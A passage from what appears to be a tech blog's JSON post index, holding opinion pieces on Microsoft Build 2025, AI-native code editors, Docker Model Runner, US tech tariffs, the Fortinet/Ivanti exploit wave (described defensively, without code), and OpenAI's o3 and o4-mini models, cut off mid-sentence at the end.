2025","externalUrl":null,"permalink":"/posts/250529-opentofu-terraform-fork-maturing/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A year and a half after forking from Terraform, OpenTofu is proving that community-driven infrastructure tooling can thrive — but challenges remain.","title":"OpenTofu at One — How the Terraform Fork Found Its Footing","type":"posts"},{"content":"Another May, another Microsoft Build. I\u0026rsquo;ve been watching these keynotes for longer than I care to admit, and this year\u0026rsquo;s event in Seattle felt like the moment Microsoft\u0026rsquo;s AI strategy finally cohered into something you can evaluate as an engineering platform rather than a collection of impressive demos. The message was unmistakable: Microsoft wants Azure to be the place where AI applications get built, deployed, and managed — and they\u0026rsquo;re building the toolchain to make that argument compelling.\nThe Copilot Stack Matures # The centerpiece of this year\u0026rsquo;s announcements was the evolution of what Microsoft calls the \u0026ldquo;Copilot Stack.\u0026rdquo; Rather than positioning Copilot as a single product, they\u0026rsquo;re now framing it as a layered platform that developers can build on. At the bottom: Azure AI infrastructure with the latest model hosting capabilities. In the middle: orchestration services for building agent-based applications. At the top: Copilot experiences embedded across Microsoft 365, Windows, and third-party applications.\nWhat caught my attention was the Azure AI Foundry updates. The model catalog now includes not just OpenAI\u0026rsquo;s models but a growing roster of open-source alternatives — Llama, Mistral, Phi — all deployable with consistent APIs and monitoring. For teams that want to avoid vendor lock-in on the model layer while still getting enterprise-grade infrastructure, this is genuinely useful. Interestingly, this multi-model approach mirrors how foundation model capabilities are evolving across the industry.\nThe new agent orchestration framework is perhaps the most ambitious piece. Microsoft is betting that the next wave of AI applications won\u0026rsquo;t be chatbots — they\u0026rsquo;ll be autonomous agents that can plan, execute multi-step workflows, and coordinate with each other. The tooling they showed for building, testing, and monitoring these agents is still early, but the direction is clear.\nGitHub Copilot Goes Agentic # The GitHub announcements at Build deserve their own section. Copilot Workspace — the feature that lets you go from issue to pull request with AI assistance — is getting significant upgrades. The new version can handle more complex, multi-file changes and includes better planning capabilities that show you what it intends to do before it does it.\nMore interesting to me was the deeper integration between GitHub Copilot and Azure DevOps pipelines. The vision they\u0026rsquo;re painting is one where AI assists not just in writing code but in reviewing it, deploying it, and monitoring it in production. This approach echoes the broader trend of AI-native integrated development environments that are redefining the developer experience. Whether you find that exciting or terrifying probably says something about your relationship with automation.\nI\u0026rsquo;ll admit I was skeptical about \u0026ldquo;agentic\u0026rdquo; coding when the term first started circulating. But after watching the demos — and more importantly, after talking to teams who are using early versions in production — I\u0026rsquo;m coming around. The key insight is that these agents work best not as autonomous coders but as highly capable assistants that handle the routine parts of software development while humans focus on architecture and design decisions.\n.NET and Developer Tooling # Buried under the AI headlines were some solid developer tooling updates. .NET 10 previews showed continued performance improvements and better cloud-native support. The new Aspire dashboard for distributed application development looks genuinely useful — finally, a sane way to manage the constellation of services that modern .NET applications depend on.\nVisual Studio and VS Code both got updates focused on — you guessed it — AI integration. But the more practical improvements were around debugging distributed systems and profiling cloud-deployed applications. These are the kinds of features that don\u0026rsquo;t make keynote highlights but save developers hours of frustration in their daily work.\nMAUI, Microsoft\u0026rsquo;s cross-platform UI framework, continues its slow march toward maturity. I remain cautiously optimistic here — the idea of sharing UI code across platforms is appealing, but the execution has been inconsistent. The performance improvements they showed were encouraging, though I\u0026rsquo;d want to see them validated in production scenarios.\nThe Competitive Landscape # What makes Build 2025 interesting is the competitive context. Google I/O happened the same week, and AWS re:Invent is only months away. Each cloud provider is making its version of the same argument: \u0026ldquo;build your AI applications here.\u0026rdquo; Microsoft\u0026rsquo;s advantage is the integration story — Azure to GitHub to VS Code to Microsoft 365 is a remarkably complete pipeline if you buy into the ecosystem.\nThe risk for Microsoft is the same as it\u0026rsquo;s always been: complexity. The Azure portal already feels overwhelming for newcomers, and adding layers of AI services doesn\u0026rsquo;t simplify things. The teams I talk to who are most successful with Azure are the ones with dedicated platform engineers who can navigate the maze. That\u0026rsquo;s not a great story for the startup or mid-size company that just wants to deploy an AI feature.\nGoogle\u0026rsquo;s counter-argument is simplicity and model quality. AWS\u0026rsquo;s counter-argument is flexibility and existing market share. The next twelve months will be fascinating to watch.\nMy Take # Microsoft is doing something genuinely impressive at the platform level. The integration between Azure, GitHub, and the developer toolchain is deeper and more thoughtful than anything the competition offers. If I were starting a new enterprise project today and my team was already in the Microsoft ecosystem, the argument for going all-in on the Copilot Stack would be strong — especially if navigating AI governance and compliance requirements is a priority.\nBut I keep coming back to a fundamental concern: are we building applications that depend on AI capabilities we don\u0026rsquo;t fully understand? The agent orchestration demos were slick, but the failure modes of autonomous AI agents in production are still poorly characterized. I\u0026rsquo;d love to see Microsoft invest as heavily in observability and safety tooling for AI agents as they are in the agents themselves.\nBuild 2025 showed us where enterprise software development is heading. Whether we\u0026rsquo;re ready for that destination is a different question entirely.\n","date":"22 May 2025","externalUrl":null,"permalink":"/posts/250522-microsoft-build-2025-ai-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Build 2025 revealed Microsoft’s strategy to make Azure the default platform for AI development — from model hosting to agent orchestration.","title":"Microsoft Build 2025 — The AI Platform Play Comes Into Focus","type":"posts"},{"content":"The code editor landscape hasn\u0026rsquo;t seen this much disruption since VS Code dethroned Sublime Text and Atom nearly a decade ago. But the latest wave of challengers isn\u0026rsquo;t competing on speed, themes, or plugin ecosystems — they\u0026rsquo;re competing on how deeply AI is woven into the editing experience itself. This evolution from the early days of GitHub Copilot through modern AI-native editors represents a fundamental shift in how developers interact with code.\nFrom Autocomplete to Co-Pilot to Co-Author # The progression has been remarkably fast. GitHub Copilot launched in 2021 as a fancy autocomplete tool — impressive, occasionally wrong, but fundamentally an add-on. You were still driving. Then came the \u0026ldquo;chat in sidebar\u0026rdquo; phase — Copilot Chat, Codeium\u0026rsquo;s assistant panel, Amazon CodeWhisperer\u0026rsquo;s suggestions. Useful, but bolted on.\nWhat Cursor and similar AI-native editors are doing is different. The AI isn\u0026rsquo;t a feature; it\u0026rsquo;s the architecture. Tab-completion that understands your entire codebase. Inline editing that rewrites functions based on natural language instructions. Multi-file refactoring that actually works across module boundaries. This architectural shift aligns with the AI platform strategies that major vendors are pursuing, embedding AI at the foundational level.\nI\u0026rsquo;ve been writing code professionally for three decades, and I can tell you: the gap between \u0026ldquo;AI-assisted editing\u0026rdquo; and \u0026ldquo;AI-native editing\u0026rdquo; feels similar to the gap between editing code in Notepad versus using a proper IDE. Once you\u0026rsquo;ve experienced the latter, going back feels painful.\nThe Cursor Phenomenon # Cursor has been the breakout story. Built as a fork of VS Code — which means all your extensions and keybindings carry over — it layers AI capabilities at a fundamental level. The \u0026ldquo;Composer\u0026rdquo; feature lets you describe changes across multiple files and watch them materialize. The codebase indexing means the AI actually understands your project structure, not just the file you have open.\nWhat\u0026rsquo;s struck me most is the adoption pattern. This isn\u0026rsquo;t just enthusiasts and early adopters anymore. I\u0026rsquo;m seeing it in enterprise teams, in agencies, in the kind of shops that were running Eclipse five years ago. When developers with 15+ years of experience tell me they can\u0026rsquo;t go back to a non-AI editor, that\u0026rsquo;s a signal worth paying attention to.\nWindsurf (formerly Codeium\u0026rsquo;s editor play) is taking a similar approach but with a different philosophy around \u0026ldquo;Flows\u0026rdquo; — longer-form AI interactions that maintain context across a development session. It\u0026rsquo;s more opinionated about workflow, which some developers love and others find constraining.\nWhat This Means for VS Code and JetBrains # The incumbents aren\u0026rsquo;t standing still. VS Code\u0026rsquo;s Copilot integration keeps getting deeper — inline chat, workspace-aware suggestions, the recently improved agent mode. JetBrains has been rolling out their AI Assistant across the IntelliJ platform. But there\u0026rsquo;s a structural challenge: when AI is a retrofit rather than a foundation, there are limits to how deeply it can integrate.\nThat said, I wouldn\u0026rsquo;t count Microsoft out. They own both VS Code and GitHub Copilot, and the resources they can throw at this problem are enormous. The question is whether organizational complexity slows them down enough for the startups to establish defensible positions.\nJetBrains is in a more interesting spot. Their editors have always been opinionated and deeply integrated — the \u0026ldquo;it just works\u0026rdquo; philosophy that Java and Kotlin developers swear by. If anyone can make AI feel native in an existing editor, it\u0026rsquo;s them. But the early returns suggest they\u0026rsquo;re playing catch-up.\nThe Productivity Question # Here\u0026rsquo;s the thing everyone wants to know: do AI-native editors actually make you more productive? My honest answer after months of use: yes, but not in the way you might expect.\nThe big wins aren\u0026rsquo;t in writing code faster. They\u0026rsquo;re in reducing the friction of unfamiliar codebases, automating tedious refactoring, and — perhaps most importantly — lowering the activation energy for tasks you\u0026rsquo;d otherwise procrastinate on. That test file you should write? Much easier when you can describe what it should cover and have a solid first draft appear. That API integration you\u0026rsquo;ve been putting off? Describing the data flow and watching the boilerplate materialize removes the \u0026ldquo;ugh\u0026rdquo; factor.\nThe risk, of course, is over-reliance. I\u0026rsquo;ve caught myself accepting AI-generated code without the scrutiny I\u0026rsquo;d apply to my own work. Code review skills become even more critical when a significant portion of the code was machine-generated. And there\u0026rsquo;s a real concern about junior developers who learn to prompt before they learn to program — an issue compounded by the rapid evolution of language model capabilities that leave traditional programming education perpetually behind.\nMy Take # We\u0026rsquo;re in the \u0026ldquo;Cambrian explosion\u0026rdquo; phase of AI-native development tools. A year from now, the landscape will look very different — some of these tools will have consolidated, others will have found niches, and the incumbents will have closed some of the gap. But the fundamental shift toward AI-native editing environments feels irreversible.\nMy advice to fellow developers: try at least one AI-native editor for a real project, not just a toy example. Give it two weeks. You\u0026rsquo;ll either be converted or you\u0026rsquo;ll have a much more informed opinion about what these tools actually offer versus what the hype suggests.\nThe editor wars never really end — they just find new dimensions to fight over. This time, the dimension is intelligence.\n","date":"15 May 2025","externalUrl":null,"permalink":"/posts/250515-ai-native-ides-cursor-copilot/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Cursor, Windsurf, and the growing wave of AI-native editors are reshaping how developers write code — and challenging the incumbents.","title":"AI-Native IDEs — The Editor Wars Have a New Front","type":"posts"},{"content":"Docker announced Model Runner this week, a new feature in Docker Desktop that lets you pull and run AI models locally using the same familiar workflow you\u0026rsquo;d use for container images. If you\u0026rsquo;ve ever wished you could just docker run a language model the way you spin up a PostgreSQL container, that\u0026rsquo;s essentially what this enables. And after spending a couple of days experimenting with it, I think it\u0026rsquo;s a bigger deal than the understated announcement might suggest.\nThe feature is currently in beta as part of Docker Desktop 4.41, and it supports a growing catalog of models from Hugging Face and other registries. You can run models locally using your machine\u0026rsquo;s GPU (or CPU, with corresponding performance trade-offs), and they integrate with Docker\u0026rsquo;s existing networking and volume systems.\nHow It Works # The basic workflow is surprisingly straightforward. Docker has extended its CLI and Desktop UI to support model management as a first-class concept. You can pull models from registries, list available models, and run inference — all through the Docker interface you already know.\nUnder the hood, Docker Model Runner leverages llama.cpp and similar inference engines, packaged and managed by Docker\u0026rsquo;s runtime. The models are stored in Docker\u0026rsquo;s content store alongside your container images, and they benefit from the same layer caching and deduplication mechanisms. If you pull two models that share a base architecture, Docker is smart enough to reuse the common layers.\nWhat makes this different from just running Ollama or llama.cpp directly is the integration story. Docker Model Runner exposes a local API endpoint that\u0026rsquo;s compatible with the OpenAI API format. This means any application code that talks to OpenAI\u0026rsquo;s API can be pointed at your local model runner with just a URL change. For development and testing, this is extremely practical.\nThe Docker Compose integration is where things get really interesting. You can define a model as a service in your docker-compose.yml alongside your application containers, your database, your message queue — everything spins up together. Your application connects to the model service over Docker\u0026rsquo;s internal network, just like it would connect to any other service.\nWhy This Matters for Development Workflows # The pain point Docker is addressing here is real. Right now, if you\u0026rsquo;re building an application that uses AI models, your development workflow probably looks something like this: you call an external API (OpenAI, Anthropic, etc.) during development, which means you need API keys, network access, and you\u0026rsquo;re paying per request. The shift toward in-context learning makes this even more relevant — when you\u0026rsquo;re experimenting with prompt engineering and context structures, paying per token during development adds up fast. Or you run something like Ollama separately, manage it as a distinct tool, and wire things together manually. With Docker Model Runner, you integrate it into the same reproducible environment that infrastructure-as-code tools like Terraform manage for other services.\nDocker Model Runner collapses this into the standard Docker development workflow. Clone a repo, run docker compose up, and you have your entire application stack — including the AI model — running locally. No external API calls, no separate tool management, no API keys needed for basic development.\nFor teams working on AI-powered applications, this addresses several practical problems:\nOffline development: You can work on AI features on a plane, in a coffee shop with bad WiFi, or in an air-gapped environment. The model runs locally, no network required.\nCost control during development: Every time a developer hits \u0026ldquo;run tests\u0026rdquo; against an external AI API, the meter is ticking. Local models eliminate that cost for development and testing cycles.\nReproducibility: When the model is part of your Docker Compose stack, every developer on the team is running the same model version. No more \u0026ldquo;works on my machine\u0026rdquo; issues caused by different API model versions or rate limiting. This mirrors the advantages we\u0026rsquo;ve seen with containerized infrastructure — codified, versioned, reproducible environments. Especially important when governance requirements like the EU AI Act mandate precise documentation of which models and versions were used.\nPrivacy: For applications handling sensitive data, running inference locally during development means that data never leaves the machine. This is significant for healthcare, finance, and other regulated industries.\nPerformance Reality Check # Let\u0026rsquo;s be honest about the limitations. Running a 7B parameter model on a developer\u0026rsquo;s laptop is not the same as hitting GPT-4o or Claude via API. The model quality is lower, the inference speed depends heavily on your hardware, and the larger models that produce better results require serious GPU memory. For context, the latest large models like Llama 3.1 run much better on server-class hardware, but the smaller models bundled with Docker Model Runner are optimized for developer machines.\nOn my MacBook Pro with an M3 Max and 64GB of unified memory, I can run 13B parameter models comfortably and get reasonable inference speeds — maybe 15-20 tokens per second. That\u0026rsquo;s workable for development but not great for anything interactive. Smaller 7B models run faster, around 30-40 tokens per second, but with correspondingly lower quality.\nThe sweet spot I\u0026rsquo;ve found is using local models for development and testing of the integration layer — making sure your prompts are structured correctly, your response parsing handles edge cases, and your application logic works — while accepting that the actual model quality will be different in production. Think of it like developing against a local SQLite database when your production runs PostgreSQL. The interface is the same, the behavior is close enough for development, but you still need to test against the real thing.\nThe Docker Ecosystem Play # What Docker is really doing here is extending their platform strategy. They\u0026rsquo;ve already won the \u0026ldquo;how developers run local infrastructure\u0026rdquo; battle with Docker Compose. By adding AI models to that same ecosystem, they\u0026rsquo;re ensuring that Docker Desktop remains the central tool in the development workflow even as AI becomes a core component of more applications.\nIt\u0026rsquo;s a smart move. The alternative was that developers would adopt a separate tool for local AI — Ollama, LM Studio, or something similar — and Docker\u0026rsquo;s role would be limited to the non-AI parts of the stack. By integrating model running into Docker itself, they maintain their position as the unified development environment.\nI also expect this to drive model registry standards in interesting directions. Docker has already influenced container image standards through OCI. If they push for similar standardization around model packaging and distribution, that could benefit the entire ecosystem. We\u0026rsquo;ve seen this playbook work before with infrastructure tooling — standardization and open-source alternatives drive innovation and adoption as maturity increases.\nMy Take # Docker Model Runner is one of those features that seems incremental until you actually use it. The moment you add a model service to your Docker Compose file and have your entire AI-powered application stack running with a single command, the developer experience improvement is tangible.\nIs it going to replace cloud-based AI APIs in production? No. Is it going to change how teams develop and test AI-powered applications? I think so, yes. The friction reduction is significant, and in my experience, reducing friction in development workflows has an outsized impact on team productivity and code quality.\nIf you\u0026rsquo;re building anything that integrates AI models, I\u0026rsquo;d recommend trying Docker Model Runner in your development stack this week. The setup takes about fifteen minutes, and the workflow improvement is immediate. Just make sure your laptop has enough RAM — those models are hungry.\n","date":"8 May 2025","externalUrl":null,"permalink":"/posts/250508-docker-model-runner-local-ai/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Docker’s new Model Runner feature brings local AI model execution into the Docker Desktop workflow, blurring the line between containers and inference.","title":"Docker Model Runner — Running AI Models Alongside Your Containers","type":"posts"},{"content":"The past few weeks have been a whirlwind in global trade policy, and for the first time in my career, tariff discussions are showing up in engineering planning meetings. The sweeping US tariffs announced in early April — including significant levies on electronics, semiconductors, and computing equipment — are creating real uncertainty for technology companies and the engineers who build their systems.\nI normally don\u0026rsquo;t write about trade policy. But when tariffs start affecting server hardware costs, cloud pricing forecasts, and the availability of development hardware, it becomes an engineering problem. And right now, it\u0026rsquo;s becoming a significant one.\nWhat\u0026rsquo;s Actually Happening # The tariff situation is complex and still evolving. The key points relevant to technology teams:\nThe US has imposed tariffs on a broad range of imported goods, with rates varying significantly by country of origin. While smartphones and some consumer electronics received temporary exemptions, server hardware, networking equipment, and many electronic components are subject to tariffs ranging from 10% to over 100% depending on origin. This is part of a longer pattern of supply chain disruptions in technology — the JavaScript ecosystem has dealt with similar supply chain pressures through security challenges.\nChina-manufactured technology products face the steepest tariffs. This is particularly significant because a substantial portion of the world\u0026rsquo;s servers, switches, and storage hardware is manufactured in or has major supply chain dependencies on Chinese factories. Even \u0026ldquo;American\u0026rdquo; hardware companies often rely on Chinese manufacturing for key components or final assembly.\nThe semiconductor situation is nuanced — there\u0026rsquo;s been talk of specific semiconductor tariffs, but the existing CHIPS Act investments and the strategic importance of chip supply have made this politically complicated. What\u0026rsquo;s clear is that the cost of computing hardware is going up, and the timeline for that increase is months, not years.\nImpact on Cloud Infrastructure # For most software teams, the immediate question is: how does this affect cloud costs? The cloud providers — AWS, Azure, and Google Cloud — haven\u0026rsquo;t announced significant price increases yet, but the math is straightforward. If the servers going into data centers cost 15-30% more, that cost gets passed through eventually.\nThe hyperscalers have some buffer here. They negotiate long-term hardware contracts, maintain significant inventory, and have been diversifying their manufacturing supply chains for years (partly in response to earlier rounds of trade tensions). AWS, for example, has been building custom Graviton chips fabricated by TSMC in Taiwan, and has been expanding data center construction in regions with more favorable trade positions.\nBut the buffer isn\u0026rsquo;t infinite. If tariffs persist at current levels, I\u0026rsquo;d expect cloud pricing adjustments by Q3 or Q4 of this year. The question is how it manifests — direct price increases on existing instances, or more subtle changes like shifting the pricing tiers to make newer (more cost-efficient) instance types relatively more attractive while quietly retiring cheaper legacy options.\nFor organizations running on-premises or hybrid infrastructure, the impact is more immediate. If you\u0026rsquo;re planning hardware refreshes or data center expansions, your procurement costs just went up significantly. I\u0026rsquo;m already hearing from colleagues that lead times for enterprise server orders are extending as vendors work through the logistics.\nWhat About Development Hardware? # The tariff exemptions for smartphones and laptops are temporary and partial. Developer workstations, high-end GPUs for local ML development, and networking equipment for lab environments are all potentially affected.\nNVIDIA GPUs, which have become essential tools for ML engineering teams, are largely manufactured by partners in Taiwan and China. While NVIDIA designs the chips and TSMC fabricates the silicon, the actual board manufacturing and assembly often happens in China. The tariff implications for GPU pricing are still shaking out, but upward pressure on prices seems inevitable.\nFor teams that rely on local GPU infrastructure for model training or fine-tuning, this could accelerate the move to cloud-based ML platforms. The economics might shift to make cloud GPU instances more attractive relative to buying and maintaining your own hardware, even if cloud prices also increase.\nSupply Chain Diversification for Software # There\u0026rsquo;s a broader lesson here for software engineering teams, even those who don\u0026rsquo;t directly purchase hardware. Supply chain risk isn\u0026rsquo;t just about physical components — it extends to the services and infrastructure we depend on.\nConsider your dependencies: Where are your cloud provider\u0026rsquo;s data centers? What happens to your latency and compliance posture if you need to shift regions? Are your critical SaaS tools pricing-stable, or could they pass through hardware cost increases? If you\u0026rsquo;re running edge computing or IoT deployments, how exposed are your device manufacturers to tariff impacts?\nThese aren\u0026rsquo;t questions most software engineers have had to think about before. But the increasing entanglement of technology and trade policy means infrastructure planning now requires awareness of geopolitical risk. This awareness of supply chain vulnerability extends to the need for stronger supply chain security practices across all layers of technology infrastructure. It\u0026rsquo;s uncomfortable, but it\u0026rsquo;s real.\nPlanning for Uncertainty # My practical advice for engineering teams navigating this:\nShort term (next 3 months): Lock in any pending hardware purchases at current prices if you can. Review your cloud committed-use discounts and reserved instances — if you were on the fence about committing, the calculus may have changed. Build cost monitoring dashboards if you don\u0026rsquo;t have them already.\nMedium term (3-12 months): Evaluate workload placement flexibility. Can you run in multiple regions? Can you shift between cloud providers if pricing changes significantly? Invest in containerization and infrastructure-as-code that makes portability practical, not just theoretical.\nLong term: Accept that hardware costs are a variable, not a constant. Build cost awareness into your architecture decisions. The era of reliably declining compute costs may be pausing, and that changes the optimization landscape for system design.\nMy Take # I find it somewhat surreal to be writing about tariff policy on a tech blog, but here we are. The technology industry has operated in a globally integrated supply chain for decades, and we\u0026rsquo;ve built our planning assumptions around that reality. Tariffs don\u0026rsquo;t just increase costs — they inject uncertainty, and uncertainty is harder to manage than known cost increases.\nThe silver lining, if there is one, is that this pressure accelerates important engineering practices. Multi-cloud portability, infrastructure automation, cost-aware architecture, and supply chain transparency are all things we should have been investing in anyway. These practices align well with the broader industry shift toward infrastructure-as-code and platform engineering that enables the flexibility needed to navigate economic uncertainty. If tariff uncertainty provides the business case to finally do that work properly, then at least the disruption produces something valuable.\nFor now, keep building, keep monitoring your costs, and keep your deployment pipelines flexible. The ground is shifting, and the teams that adapt fastest will have an advantage.\n","date":"1 May 2025","externalUrl":null,"permalink":"/posts/250501-tech-tariffs-software-supply-chain/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"New US tariffs on technology imports are sending ripples through hardware supply chains, cloud pricing, and software infrastructure planning.","title":"Tech Tariffs and the Software Supply Chain — What Engineers Need to Know","type":"posts"},{"content":"If you manage any kind of network infrastructure, the past few weeks have been rough. Multiple actively exploited vulnerabilities in Fortinet FortiGate firewalls and Ivanti Connect Secure VPN appliances have sent security teams scrambling, and CISA has added several of these to their Known Exploited Vulnerabilities catalog. This isn\u0026rsquo;t theoretical risk — these are being used in the wild right now by sophisticated threat actors.\nHaving dealt with my share of emergency patching cycles over three decades, this wave feels particularly concerning. Not because the individual vulnerabilities are unprecedented — we\u0026rsquo;ve seen similar supply chain exploitation nightmares before — but because of what they collectively reveal about the state of perimeter security.\nWhat\u0026rsquo;s Being Exploited # The Fortinet situation involves a series of vulnerabilities that allow attackers to gain and maintain persistent access to FortiGate devices. The most critical is an authentication bypass that allows remote attackers to gain super-admin privileges through crafted requests to the Node.js websocket module. What makes this particularly nasty is that attackers have been creating local admin accounts and modifying firewall configurations to establish persistent access — meaning even after you patch, the backdoor might still be there.\nFortinet published advisories and patches, but evidence suggests that threat actors had been exploiting some of these vulnerabilities before patches were available. Several security researchers have documented cases where attackers maintained access for weeks before detection.\nOn the Ivanti side, Connect Secure (formerly Pulse Secure) VPN appliances continue to be targeted. New vulnerabilities have been disclosed that allow unauthenticated remote code execution. Given Ivanti\u0026rsquo;s track record over the past year — this is at least the third major exploit wave targeting their VPN products — many organizations are seriously reconsidering their reliance on these devices.\nThe Perimeter Security Paradox # Here\u0026rsquo;s the fundamental problem: the devices we rely on to secure our network perimeters are themselves some of the most vulnerable components in our infrastructure. Firewalls, VPN concentrators, and edge gateways run complex software stacks with web interfaces, management APIs, and custom protocols. They\u0026rsquo;re accessible from the internet by design. And when they\u0026rsquo;re compromised, attackers get access to everything behind them.\nThis isn\u0026rsquo;t a new observation, but the frequency and severity of these incidents should force a reckoning. The traditional network security model — put a hardened perimeter device at the edge and trust everything behind it — has been failing for years. Zero-trust architecture isn\u0026rsquo;t just a buzzword; it\u0026rsquo;s becoming a survival requirement. We see this pattern repeat across attack vectors: supply chain attacks on CI/CD systems exploit similar trust assumptions about infrastructure components.\nThe irony is thick: we keep buying expensive security appliances to protect our networks, and those appliances keep becoming the primary attack vector. At some point, the industry needs to ask whether the perimeter appliance model itself is the problem.\nWhat to Do Right Now # If you\u0026rsquo;re running affected Fortinet or Ivanti devices, here\u0026rsquo;s what I\u0026rsquo;d recommend based on the guidance from CISA and the security research community:\nImmediate actions:\nApply available patches. This should go without saying, but the number of unpatched devices visible on Shodan suggests it needs repeating. Review device configurations for unauthorized admin accounts, modified firewall rules, or unexpected VPN tunnels. Check logs for indicators of compromise (IoCs). Both Fortinet and multiple security vendors have published detailed IoC lists. If you find evidence of compromise, assume the device is fully owned. Reset to factory defaults, update firmware, and rebuild the configuration from known-good backups. Longer-term considerations:\nImplement network segmentation that doesn\u0026rsquo;t rely solely on perimeter devices. Even if your firewall is compromised, lateral movement should be limited. Deploy monitoring that can detect anomalous behavior from infrastructure devices — unusual DNS queries, unexpected outbound connections, configuration changes outside maintenance windows. Evaluate whether your VPN architecture could be replaced or supplemented with identity-aware proxy solutions (like BeyondCorp-style access) that reduce the attack surface. The Patch Gap Problem # One pattern that keeps repeating in these incidents is the window between vulnerability disclosure and actual patching. Security researchers and vendors discover the flaw, a patch is released, advisories go out — and then weeks pass before many organizations apply the fix. Attackers know this and increasingly automate exploitation to hit vulnerable devices in the gap.\nPart of the problem is operational: patching a firewall or VPN appliance often means a maintenance window, potential connectivity disruption, and testing to ensure nothing breaks. For organizations running 24/7 operations, that\u0026rsquo;s a significant coordination effort. But the alternative — leaving a known-exploited vulnerability unpatched — is far worse.\nAutomation helps here. If you\u0026rsquo;re not already using infrastructure-as-code practices for your network devices, this is a good motivation to start. Being able to rapidly rebuild a device configuration from code, test it in a staging environment, and deploy it with confidence makes emergency patching much less painful. This approach aligns with broader efforts around supply chain security standards like SLSA, which emphasize automation and reproducibility.\nMy Take # I\u0026rsquo;ve been doing this long enough to see the same patterns repeat. In the late 2000s, it was web application firewalls getting owned. In the 2010s, it was SSL VPN appliances. Now it\u0026rsquo;s the next generation of the same fundamental architecture — complex, internet-facing security appliances that become single points of failure when compromised.\nThe organizations that weather these storms best are the ones that don\u0026rsquo;t trust any single component completely. Defense in depth isn\u0026rsquo;t just a theoretical framework — it\u0026rsquo;s the practical difference between \u0026ldquo;we patched and moved on\u0026rdquo; and \u0026ldquo;we\u0026rsquo;re rebuilding our entire network because the firewall was a backdoor for three months.\u0026rdquo;\nIf this spring\u0026rsquo;s exploit wave motivates you to accelerate your zero-trust roadmap, then at least some good came from it. Start small — mutual TLS between services, identity-aware access controls, microsegmentation in your most critical environments. The perimeter isn\u0026rsquo;t going to protect you. Your architecture has to protect itself.\n","date":"24 April 2025","externalUrl":null,"permalink":"/posts/250424-spring-2025-exploit-wave-fortinet-ivanti/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"A surge of active exploitation targeting Fortinet and Ivanti edge devices highlights the persistent vulnerability of network perimeter infrastructure.","title":"The Spring 2025 Exploit Wave — Fortinet, Ivanti, and the Perimeter Problem","type":"posts"},{"content":"OpenAI just dropped two new models this week — o3 and o4-mini — and they represent a meaningful shift in how we think about AI-assisted development. These aren\u0026rsquo;t just incremental improvements over GPT-4o. They\u0026rsquo;re purpose-built reasoning models that think through problems step by step before generating answers, and the difference in output quality for complex tasks is immediately noticeable.\nI\u0026rsquo;ve spent the past few days putting both models through their paces on real engineering problems — debugging race conditions, analyzing system architectures, and working through infrastructure planning. Here\u0026rsquo;s what I\u0026rsquo;ve found.\nWhat \u0026ldquo;Reasoning Models\u0026rdquo; Actually Means # The o-series models differ from standard GPT models in a fundamental way: they use chain-of-thought reasoning at inference time. When you give o3 a complex problem, it doesn\u0026rsquo;t immediately start generating tokens. Instead, it works through the problem internally, considering multiple approaches, identifying potential issues, and structuring its reasoning before producing an answer.\nThis isn\u0026rsquo;t just prompt engineering magic — it\u0026rsquo;s an architectural difference. The model allocates additional compute to the reasoning phase, which means responses take longer to generate but are significantly more accurate for problems that require multi-step logic, mathematical reasoning, or careful analysis of edge cases.\no3 is the full-size model, positioned as OpenAI\u0026rsquo;s most capable reasoning system. o4-mini is the smaller, faster variant that trades some reasoning depth for significantly lower latency and cost. In my testing, o4-mini handles probably 80% of coding tasks just as well as o3, at a fraction of the cost. The gap shows up in truly complex scenarios — multi-file refactoring across a large codebase, or debugging subtle concurrency issues where the reasoning chain needs to be quite deep.\nTool Use and Agentic Capabilities # What sets o3 apart from earlier o-series models isn\u0026rsquo;t just better reasoning — it\u0026rsquo;s the integration with tool use. This mirrors the evolution of foundation models like Claude that are gaining expanded capabilities for reasoning and action. o3 can browse the web, execute code, analyze images, and chain multiple tool calls together in a single reasoning session. This is where things get interesting for developers.\nI tested o3 with a real-world scenario: given a Python application with a performance regression, could it identify the root cause? I gave it access to the codebase, profiling data, and the ability to run code. The model systematically profiled the hot paths, identified an N+1 query pattern introduced in a recent commit, and suggested a fix with the correct SQLAlchemy eager loading syntax. The entire chain of reasoning was visible and auditable.\nThis is qualitatively different from asking GPT-4o the same question. GPT-4o would give you a reasonable guess. o3 actually works through the problem methodically, and the tool use means it can verify its hypotheses before presenting conclusions.\nWhere It Falls Short # It\u0026rsquo;s not all perfect. The reasoning models have some real limitations that are worth understanding before you rebuild your workflows around them.\nFirst, latency. o3 can take 30-60 seconds to respond to complex queries. For interactive coding assistance — the kind of thing where you want instant suggestions as you type — that\u0026rsquo;s too slow. o4-mini is much faster (typically 5-15 seconds), but it\u0026rsquo;s still noticeably slower than GPT-4o\u0026rsquo;s sub-second responses for simple tasks.\nSecond, cost. o3 is expensive. The reasoning tokens count toward your usage, and for a complex problem, the model might generate thousands of reasoning tokens before producing a response. If you\u0026rsquo;re running this at scale — say, as part of a CI/CD pipeline for automated code review — the costs add up fast. You need to be strategic about when to use o3 versus o4-mini versus GPT-4o.\nThird, the reasoning isn\u0026rsquo;t always right. The chain-of-thought process can lead the model down incorrect reasoning paths, and because the reasoning feels more authoritative, there\u0026rsquo;s a risk of over-trusting the output. I caught o3 making a confident but incorrect assertion about Python\u0026rsquo;s GIL behavior in a threading analysis. The lesson: verify outputs, especially for anything that matters in production — a critical principle that regulatory frameworks like the EU AI Act are starting to mandate formally.\nPractical Integration Patterns # For my own workflow, I\u0026rsquo;ve settled on a tiered approach:\nGPT-4o for quick questions, documentation lookups, and simple code generation o4-mini for code review, bug analysis, and architectural discussions o3 for the hard problems — complex debugging sessions, security analysis, and system design reviews The API supports all three, so you can build tooling that routes requests to the appropriate model based on complexity. I\u0026rsquo;ve been experimenting with a simple heuristic: if the prompt contains more than 500 tokens of context and asks an analytical question, route to o4-mini. If it\u0026rsquo;s a multi-file analysis or explicitly complex, route to o3. Everything else goes to GPT-4o.\nMy Take # The o3/o4-mini release feels like a genuine step forward, not just marketing. The reasoning capabilities produce measurably better results on complex engineering tasks, and the tool use integration makes these models genuinely useful as development assistants rather than just fancy autocomplete.\nBut I want to temper the enthusiasm with a practical note: these models are tools, not replacements for engineering judgment. The most effective use I\u0026rsquo;ve found is as a rigorous 